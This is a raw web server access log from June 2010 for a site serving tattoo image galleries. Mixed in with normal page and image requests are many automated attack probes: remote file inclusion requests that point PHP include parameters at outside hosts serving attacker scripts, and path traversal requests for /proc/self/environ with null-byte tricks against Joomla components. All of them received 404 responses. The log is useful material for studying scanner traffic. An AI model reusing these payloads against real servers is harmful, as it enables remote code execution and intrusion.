95.245.155.249 - - [02/Jun/2010:09:00:25 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:25 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:26 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:26 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:26 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
89.238.145.196 - - [02/Jun/2010:09:00:51 -0500] "GET /logs/access_log.1272585600//Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 335 "-""Mozilla/5.0"
95.245.155.249 - - [02/Jun/2010:09:00:52 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:52 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:53 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:53 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:53 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:53 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:53 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:53 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:53 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:53 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:53 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:01:26 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:01:26 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:01:26 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:01:26 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:01:27 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:01:27 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:01:27 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:01:27 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:01:27 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:01:28 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:01:28 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
210.143.98.160 - - [02/Jun/2010:09:01:54 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
69.175.83.34 - - [02/Jun/2010:09:01:57 -0500] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.175.83.34 - - [02/Jun/2010:09:01:57 -0500] "GET /logs/access_log.1262563200//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.175.83.34 - - [02/Jun/2010:09:01:57 -0500] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.83.34 - - [02/Jun/2010:09:01:57 -0500] "GET /logs/access_log.1270512000//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
95.245.155.249 - - [02/Jun/2010:09:02:01 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:02:01 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:02:02 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:02:02 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:02:02 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:02:02 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:02:02 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:02:02 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:02:02 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:02:02 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:02:02 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
38.101.148.126 - - [02/Jun/2010:09:02:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [02/Jun/2010:09:02:11 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
218.146.255.196 - - [02/Jun/2010:09:02:23 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.146.255.196 - - [02/Jun/2010:09:02:23 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.146.255.196 - - [02/Jun/2010:09:02:24 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.238.145.196 - - [02/Jun/2010:09:02:28 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:09:02:28 -0500] "GET /logs/access_log.1272326400//Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:09:02:29 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.122.52.80 - - [02/Jun/2010:09:03:00 -0500] "GET //include.php?path[docroot]=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:09:03:00 -0500] "GET /logs//include.php?path[docroot]=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
89.238.145.196 - - [02/Jun/2010:09:03:03 -0500] "GET /logs/access_log.1272585600//Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 335 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:09:03:12 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
69.175.83.34 - - [02/Jun/2010:09:03:16 -0500] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.83.34 - - [02/Jun/2010:09:03:16 -0500] "GET /logs/access_log.1262563200//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.175.83.34 - - [02/Jun/2010:09:03:16 -0500] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.175.83.34 - - [02/Jun/2010:09:03:20 -0500] "GET /logs/access_log.1270512000//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:09:03:38 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
204.93.174.47 - - [02/Jun/2010:09:03:38 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
95.245.155.249 - - [02/Jun/2010:09:03:52 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:03:52 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:03:52 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:03:52 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
204.93.174.47 - - [02/Jun/2010:09:04:10 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
204.93.174.47 - - [02/Jun/2010:09:04:10 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
204.93.174.47 - - [02/Jun/2010:09:04:10 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
89.200.142.93 - - [02/Jun/2010:09:04:36 -0500] "GET /logs/access_log.1273363200/*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.823"
89.200.142.93 - - [02/Jun/2010:09:04:36 -0500] "GET /*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.823"
89.200.142.93 - - [02/Jun/2010:09:04:36 -0500] "GET /logs/*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.823"
66.90.73.48 - - [02/Jun/2010:09:06:19 -0500] "GET /logs//index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
66.90.73.48 - - [02/Jun/2010:09:06:19 -0500] "GET //index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.195.112.180 - - [02/Jun/2010:09:08:11 -0500] "GET /logs/access_log.1212710400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.200.142.93 - - [02/Jun/2010:09:08:59 -0500] "GET /logs/access_log.1274832000/*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.823"
67.195.112.180 - - [02/Jun/2010:09:10:10 -0500] "GET /logs/access_log.1178841600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.121.58.89 - - [02/Jun/2010:09:10:54 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.58.89 - - [02/Jun/2010:09:10:54 -0500] "GET //index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.89 - - [02/Jun/2010:09:10:54 -0500] "GET /logs//index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
121.190.102.21 - - [02/Jun/2010:09:11:09 -0500] "GET /logs/access_log.1271462400//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 380 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:09:11:09 -0500] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:09:11:09 -0500] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:09:11:10 -0500] "GET /logs/access_log.1271203200//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 380 "-""Mozilla/5.0"
207.46.204.180 - - [02/Jun/2010:09:11:14 -0500] "GET /logs/access_log.1194912000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.50 - - [02/Jun/2010:09:12:40 -0500] "GET /logs/access_log.1211241600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.71.174.218 - - [02/Jun/2010:09:13:28 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.71.174.218 - - [02/Jun/2010:09:13:28 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
66.223.110.205 - - [02/Jun/2010:09:13:37 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.223.110.205 - - [02/Jun/2010:09:13:37 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [02/Jun/2010:09:13:55 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [02/Jun/2010:09:13:55 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:09:14:33 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:09:14:34 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
67.195.112.180 - - [02/Jun/2010:09:14:36 -0500] "GET /logs/access_log.1170374400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.121.58.89 - - [02/Jun/2010:09:15:14 -0500] "GET //index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.89 - - [02/Jun/2010:09:15:41 -0500] "GET //index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
77.222.56.62 - - [02/Jun/2010:09:16:09 -0500] "GET //functions.php?CONFIG[main_path]=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:09:16:09 -0500] "GET /logs//functions.php?CONFIG[main_path]=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
74.55.135.18 - - [02/Jun/2010:09:16:15 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
74.55.135.18 - - [02/Jun/2010:09:16:15 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.55.135.18 - - [02/Jun/2010:09:16:19 -0500] "GET /logs/access_log.1271548800//admin/classes/TplLoad.php?full_path_to_public_program=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.122.52.80 - - [02/Jun/2010:09:16:42 -0500] "GET //dbal.php?eqdkp_root_path=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:09:16:42 -0500] "GET /logs//dbal.php?eqdkp_root_path=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:09:17:11 -0500] "GET //sql.php?classes_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:09:17:12 -0500] "GET /logs//sql.php?classes_dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
89.200.142.93 - - [02/Jun/2010:09:17:23 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.823"
67.195.112.180 - - [02/Jun/2010:09:17:27 -0500] "GET /logs/access_log.1171411200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.90.73.48 - - [02/Jun/2010:09:18:27 -0500] "GET //index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
77.222.56.62 - - [02/Jun/2010:09:18:45 -0500] "GET //day.php?path=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:09:18:45 -0500] "GET /logs//day.php?path=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
222.122.52.80 - - [02/Jun/2010:09:18:57 -0500] "GET //kb_constants.php?module_root_path=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:09:18:57 -0500] "GET /logs//kb_constants.php?module_root_path=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
